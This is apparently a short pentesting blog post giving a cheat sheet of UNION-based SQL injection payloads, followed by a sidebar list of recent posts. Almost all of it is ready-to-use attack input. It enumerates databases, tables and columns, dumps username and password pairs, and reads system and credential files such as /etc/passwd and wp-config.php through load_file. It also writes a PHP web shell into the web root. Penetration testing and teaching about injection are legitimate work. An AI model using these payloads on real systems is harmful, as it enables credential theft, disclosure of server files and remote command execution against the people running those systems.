SQL INJECTION – Extracting Username and Password From Database
Hello! Pentesters, In this article, We will hunt How to extract Database Name, Table_Name, Column_Name, and even USERNAME and PASSWORD from a Database.
Some Basic SQL Command:
- user()
- version()
- database()
1) Find Out User Information
- union select user()
- union select database()
- union select version()
2) Find Out Database Name
- union select group_concat(schema_name) from information_schema.schemata
3) Find Out Tables Name
- union select group_concat(table_name) from information_schema.tables where table_schema=’#Database_Name’
4) Find Out Columns Name
- union select group_concat(column_name) from information_schema.columns where table_name=’#Table_Name’
5) Extract Username And Password From Database
- union select group_concat(username,’:’,password) from #table_name
6) Check All Privileges inside the Database
- union select privilege_type FROM information_schema.user_privileges where grantee = “user()” #’uhc’@’localhost’
7) Read Arbitrary Operating System File inside the Database
- union select load_file(‘/etc/passwd’)
- union select load_file(‘/etc/os-release’)
- union select load_file(‘/var/www/wordpress/wp-config.php’)
- union select load_file(‘/etc/issue’)
- union select load_file(‘/var/log/apache2/access.log’)
- union select load_file(‘/etc/apache2/sites-available/000-default.conf’)
- union select load_file(‘/etc/fstab’)
8) Create a Malicious PHP Shell Inside the Database
- union select “<?php system($_REQUEST[pentestblog]);?>” into outfile ‘/var/www/html/shell.php’
Recent Posts
- CVE-2022-30190 (Follina)-Microsoft Support Diagnostic Tool Vulnerability
- SQL INJECTION – Extracting Username and Password From Database
- How To Dump Username And Password Using SQLMap Tool?
- Protected: Exploit Apache Log4j Security Vulnerabilities – CVE-2021-44228
- Hack The Box Previse HTB CTF Machine Walkthrough